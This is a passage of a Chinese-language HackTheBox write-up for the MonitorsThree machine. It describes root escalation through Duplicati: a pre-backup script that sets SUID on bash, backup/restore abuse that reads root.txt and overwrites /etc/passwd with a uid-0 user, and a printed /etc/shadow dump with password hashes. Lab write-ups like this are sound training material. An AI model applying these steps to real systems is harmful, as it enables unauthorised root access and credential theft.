<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173114-2qx1fd2.png" alt="image">​</p>
<p>可以參考：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://forum.duplicati.com/t/custom-command-before-and-after-backup/2037/4">https://forum.duplicati.com/t/custom-command-before-and-after-backup/2037/4</a></li>
<li><a target="_blank" rel="noopener" href="https://docs.duplicati.com/en/latest/04-using-duplicati-from-the-command-line/">https://docs.duplicati.com/en/latest/04-using-duplicati-from-the-command-line/</a></li>
<li><a target="_blank" rel="noopener" href="https://docs.duplicati.com/en/latest/appendix-g-example-scripts/#run-script-examplesh">https://docs.duplicati.com/en/latest/appendix-g-example-scripts/#run-script-examplesh</a></li>
</ul>
<p>剛好在點擊網頁的時候看到有一個 commandline，所以點進去看看：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173313-s9o6oz1.png" alt="image">​</p>
<p>點help看看：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173339-3calzwq.png" alt="image">​</p>
<p>居然真的返回了help：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173305-e8x0w5z.png" alt="image">​</p>
<p>所以從上面可以猜到，網頁其實是調用命令行來執行，命令行它支持在備份前執行一些腳本，這樣也可以得到shell，再加上主機的 <code>/</code>​ 連接到了 docker裡面的 <code>/source</code>​，</p>
<p>這樣就可以製作一個腳本，讓他備份前運行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">marcus@monitorsthree:~$ <span class="built_in">echo</span> <span class="string">&#x27;#!/bin/bash&#x27;</span> &gt; /tmp/mane.sh</span><br><span class="line">marcus@monitorsthree:~$ <span class="built_in">echo</span> <span class="string">&#x27;chmod 4777 /source/bin/bash&#x27;</span> &gt;&gt; /tmp/mane.sh</span><br><span class="line">marcus@monitorsthree:~$ <span class="built_in">chmod</span> 777 /tmp/mane.sh</span><br></pre></td></tr></table></figure>

<p>然後根據上面的文檔，定義一行備份前運行腳本，也就是 <code>--run-script-before=</code>​：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825053318-w154srk.png" alt="image">​</p>
<p>等出現正在備份後，就可以：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825053427-gs9akrr.png" alt="image">​</p>
<p>‍</p>
<h3 id="ESC-2-run-script-before-again"><a href="#ESC-2-run-script-before-again" class="headerlink" title="ESC 2 - run-script-before again"></a>ESC 2 - run-script-before again</h3><p>和上面一樣，只不過是全局的配置，</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123325-s7wk4au.png" alt="image-20240828123325-s7wk4au">​</p>
<p>同樣的：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">marcus@monitorsthree:~$ <span class="built_in">echo</span> <span class="string">&#x27;#!/bin/bash&#x27;</span> &gt; /tmp/mane.sh</span><br><span class="line">marcus@monitorsthree:~$ <span class="built_in">echo</span> <span class="string">&#x27;chmod 4777 /source/bin/bash&#x27;</span> &gt;&gt; /tmp/mane.sh</span><br><span class="line">marcus@monitorsthree:~$ <span class="built_in">chmod</span> 777 /tmp/mane.sh</span><br></pre></td></tr></table></figure>

<p>定於運行備份前的腳本：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123300-561apie.png" alt="image-20240828123300-561apie">​</p>
<p>然後運行即可處罰：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123503-rycsfwz.png" alt="image-20240828123503-rycsfwz">​</p>
<p>最後：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123524-o3ysgws.png" alt="image-20240828123524-o3ysgws">​</p>
<h3 id="ESC-3-Backup-and-Restore"><a href="#ESC-3-Backup-and-Restore" class="headerlink" title="ESC 3 - Backup and Restore"></a>ESC 3 - Backup and Restore</h3><p>這種方法可以讀取和寫入任意文件，但是會有權限的問題，首先可以嘗試讀取 <code>root.txt</code>​</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124023-fcobtq4.png" alt="image-20240828124023-fcobtq4">​</p>
<p>選擇不加密：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124117-uql8knf.png" alt="image-20240828124117-uql8knf">​</p>
<p>我想要從 <code>/root/</code>​ 備份到 <code>/tmp/root.txt</code>​，因為在容器裡面，所以目的地是 <code>/source/tmp</code>​：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142335-itpz00s.png" alt="image-20240828142335-itpz00s">​</p>
<p>所以起點的 <code>/root</code>​：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124956-w6f81hx.png" alt="image-20240828124956-w6f81hx">​</p>
<p>不需要自動運行：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124347-ctp7cve.png" alt="image-20240828124347-ctp7cve">​</p>
<p>最後手動運行一下就好了：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828125147-yvsc3fe.png" alt="image-20240828125147-yvsc3fe">​</p>
<p>運行了一次備份之後，文件就會在數據庫裡面，</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124533-qisfg95.png" alt="image-20240828124533-qisfg95">​</p>
<p>所以需要從數據庫裡面還原出來：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142536-qlno4f2.png" alt="image-20240828142536-qlno4f2">​</p>
<p>然後這裡可以強行選擇 <code>root.txt</code>​，和還原到哪些地方：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142557-hd8q8x4.png" alt="image-20240828142557-hd8q8x4">​</p>
<p>手動輸入後，就可以還原文件了：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124623-dtcu9o7.png" alt="image-20240828124623-dtcu9o7">​</p>
<p>然後得到hash：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142616-d69gnfm.png" alt="image-20240828142616-d69gnfm">​</p>
<p>從這裏你會發現，我可以讀取任意文件，也可以寫入任意文件，但是這種方法似乎不可以備份和還原ssh密匙，因為權限會有問題：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828125752-minbdst.png" alt="image-20240828125752-minbdst">​</p>
<p>既然它可以覆蓋任意文件，那麽就嘗試修改 <code>/etc/passwd</code>​ 來得到shell，</p>
<p>具體如何修改 <code>/etc/passwd</code>​ 請看<a target="_blank" rel="noopener" href="https://github.com/manesec/maketoolkit-db/blob/main/Notes/Linux/Edit%20passwd%20to%20login.md">這裏</a>。</p>
<p>所以先創建一個 passwd 文件，然後通過備份和還原就可以任意修改文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">marcus@monitorsthree:~$ <span class="built_in">mkdir</span> /tmp/manesec</span><br><span class="line">marcus@monitorsthree:~$ <span class="built_in">cp</span> /etc/passwd /tmp/manesec/passwd</span><br><span class="line">marcus@monitorsthree:~$ <span class="built_in">echo</span> <span class="string">&#x27;mane:$1$manehack$rerzZaiHYZZXpZsGcJF8n1:0:0:root:/root:/bin/bash&#x27;</span> &gt;&gt; /tmp/manesec/passwd</span><br></pre></td></tr></table></figure>

<p>步驟如下：</p>
<iframe src="/maneplugin/viewerjs/slideshow.html#https://raw.githubusercontent.com/manesec/blog-open-file/master/encryption/0003.pdf?JHkkajlUJDNURFEzR1M1bFNrTndpTjRFc3hWQi8kSnl1M0NXTFRRNG1JeXB3LzAzSk90UGxlNnZkcGFvWS94Nko5YnJiVjlQNA==" width="100%" height="574px" frameborder="0" loading="lazy" allowfullscreen></iframe> 

<p>最後可以看到 <code>/etc/passwd</code>​ 被修改了，所以直接 <code>su mane</code>​， 密碼是 <code>manemane</code>​ 就得到root。</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240830081352-1m8uh4r.png" alt="image">​</p>
<h2 id="Hashes"><a href="#Hashes" class="headerlink" title="Hashes"></a>Hashes</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">root-5.1<span class="comment"># cat /etc/shadow</span></span><br><span class="line">root:$y$j9T<span class="variable">$3TDQ3GS5lSkNwiN4EsxVB</span>/<span class="variable">$Jyu3CWLTQ4mIypw</span>/03JOtPle6vdpaoY/x6J9brbV9P4:19869:0:99999:7:::</span><br><span class="line">daemon:*:19579:0:99999:7:::</span><br><span class="line">bin:*:19579:0:99999:7:::</span><br><span class="line">sys:*:19579:0:99999:7:::</span><br><span class="line"><span class="built_in">sync</span>:*:19579:0:99999:7:::</span><br><span class="line">games:*:19579:0:99999:7:::</span><br><span class="line">man:*:19579:0:99999:7:::</span><br><span class="line">lp:*:19579:0:99999:7:::</span><br><span class="line">mail:*:19579:0:99999:7:::</span><br><span class="line">news:*:19579:0:99999:7:::</span><br><span class="line">uucp:*:19579:0:99999:7:::</span><br><span class="line">proxy:*:19579:0:99999:7:::</span><br><span class="line">www-data:*:19579:0:99999:7:::</span><br><span class="line">backup:*:19579:0:99999:7:::</span><br><span class="line">list:*:19579:0:99999:7:::</span><br><span class="line">irc:*:19579:0:99999:7:::</span><br><span class="line">gnats:*:19579:0:99999:7:::</span><br><span class="line">nobody:*:19579:0:99999:7:::</span><br><span class="line">_apt:*:19579:0:99999:7:::</span><br><span class="line">systemd-network:*:19579:0:99999:7:::</span><br><span class="line">systemd-resolve:*:19579:0:99999:7:::</span><br><span class="line">messagebus:*:19579:0:99999:7:::</span><br><span class="line">systemd-timesync:*:19579:0:99999:7:::</span><br><span class="line">pollinate:*:19579:0:99999:7:::</span><br><span class="line">sshd:*:19579:0:99999:7:::</span><br><span class="line">syslog:*:19579:0:99999:7:::</span><br><span class="line">uuidd:*:19579:0:99999:7:::</span><br><span class="line">tcpdump:*:19579:0:99999:7:::</span><br><span class="line">tss:*:19579:0:99999:7:::</span><br><span class="line">landscape:*:19579:0:99999:7:::</span><br><span class="line">fwupd-refresh:*:19579:0:99999:7:::</span><br><span class="line">usbmux:*:19861:0:99999:7:::</span><br><span class="line">marcus:$y$j9T$E2hoLeuzugmRkxli4l2tW0<span class="variable">$yW1Z2shW601aB1eqvybmrTri2Z6X6l9Wz5IIhK89Dd2</span>:19861:0:99999:7:::</span><br><span class="line">lxd:!:19861::::::</span><br><span class="line">mysql:!:19861:0:99999:7:::</span><br><span class="line">Debian-snmp:!:19861:0:99999:7:::</span><br><span class="line">dnsmasq:*:19863:0:99999:7:::</span><br><span class="line">_laurel:!:19954::::::</span><br></pre></td></tr></table></figure>

<p>‍</p>
<h2 id="More-on-the-box"><a href="#More-on-the-box" class="headerlink" title="More on the box"></a>More on the box</h2><p>為什麼不允許密碼登錄ssh呢？</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cat</span> /etc/ssh/sshd_config</span><br><span class="line"></span><br><span class="line"><span class="comment"># To disable tunneled clear text passwords, change to no here! </span></span><br><span class="line">PasswordAuthentication no                                                           </span><br><span class="line">ChallengeResponseAuthentication no                                                  </span><br><span class="line"><span class="comment">#PermitEmptyPasswords no        </span></span><br></pre></td></tr></table></figure>

<p>從上面的配置文件中你可以看到它關閉了密碼驗證，這就是他為什麼設置一個很簡單的密碼。</p>
<p>‍</p>
<h1 id="Thanks"><a href="#Thanks" class="headerlink" title="Thanks"></a>Thanks</h1><p><strong>Respect</strong>: If my writeup really helps you, <a target="_blank" rel="noopener" href="https://app.hackthebox.com/users/463126">Give me a respect</a> to let me know， Thankssssss!</p>
<p><strong>感謝</strong>: 製作不易，如果我的writeup真的幫到你了, <a target="_blank" rel="noopener" href="https://app.hackthebox.com/users/463126">給我一個respect</a>，這樣我就會知道，感謝你！</p>

    <iframe src="/maneplugin/badge/htb.html" style="border:none; height: 70px" title="description"></iframe>


<p><strong>Found Mistakes</strong>: If you find something wrong in the page, please feel free email to <a href="mailto:&#109;&#97;&#x6e;&#x65;&#x40;&#x6d;&#x61;&#x6e;&#101;&#x73;&#x65;&#x63;&#46;&#99;&#111;&#109;">&#109;&#97;&#x6e;&#x65;&#x40;&#x6d;&#x61;&#x6e;&#101;&#x73;&#x65;&#x63;&#46;&#99;&#111;&#109;</a> thanksss !!!</p>
<p><strong>發現一些錯誤</strong>: 如果你找到文章中有一些錯誤，請發郵件到 <a href="mailto:&#x6d;&#x61;&#110;&#101;&#x40;&#109;&#97;&#110;&#101;&#115;&#x65;&#99;&#x2e;&#x63;&#111;&#109;">&#x6d;&#x61;&#110;&#101;&#x40;&#109;&#97;&#110;&#101;&#115;&#x65;&#99;&#x2e;&#x63;&#111;&#109;</a> ，麻煩了！！</p>
<p><strong>Beginner Recommand</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">If you are a beginner, please use this link to sign up for an HTB Academy to get more Higher level of knowledge.</a></p>
<p><strong>新手非常推薦</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">如果你是初學者，可以用此鏈接來嘗試注冊 HTB Academy 賬號。</a></p>
<p>使用上面的鏈接加入 HTB 的 academy 就可以免費看 Tire 0 的所有教程，這對初學者來説是很友好的。 （建議先完成 INTRODUCTION TO ACADEMY）</p>
<p>Join HTB’s academy with this link to get free access to all the tutorials for Tire 0. This is very beginner friendly. (It is recommended to complete INTRODUCTION TO ACADEMY first)</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <script>
        setTimeout(() => {
          makeList({
             'target': '#toc-mobile',   // Selector for element to place table of contents
             'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
          });
        }, 1000);
      </script>
    
    <div id="toc-footer" style="display: none">
      <div id="toc-mobile"></div>
    </div>

    <style>
        #toc-mobile {
        }
        #toc-mobile ul {
           display: grid ! important;
        }
        #toc-mobile li {
           margin: 0 0 0 0 ! important;
        }
        #toc-mobile .level-1 {
           color: #00b4dd ;
        }
        #toc-mobile .level-2 {
           color: #2bbc8a;
        }
        #toc-mobile .level-3 {
           color: #40474b;
        }
        #toc-mobile .level-4, #toc-mobile .level-5, #toc-mobile .level-6 {
           color: #8c8c8c;
        }
    </style>



    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&text=HackTheBox - Machine - MonitorsThree"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&is_video=false&description=HackTheBox - Machine - MonitorsThree"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Machine - MonitorsThree&body=Check out this article: https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&name=HackTheBox - Machine - MonitorsThree&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&t=HackTheBox - Machine - MonitorsThree"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
      
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>
  
  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    manesec
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- Add space -->
<script src="https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js"></script>
<script>
  document.addEventListener('DOMContentLoaded', () => {
    // listen to any DOM change and automatically perform spacing via MutationObserver()
    pangu.autoSpacingPage();
  });
</script>

<!-- fancybox support -->

       <script type="text/javascript" src="/js/fancybox/jquery.fancybox.min.js"></script>
       <script type="text/javascript" src="/js/wrapImage.js"></script>
   



<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


</body>
</html>
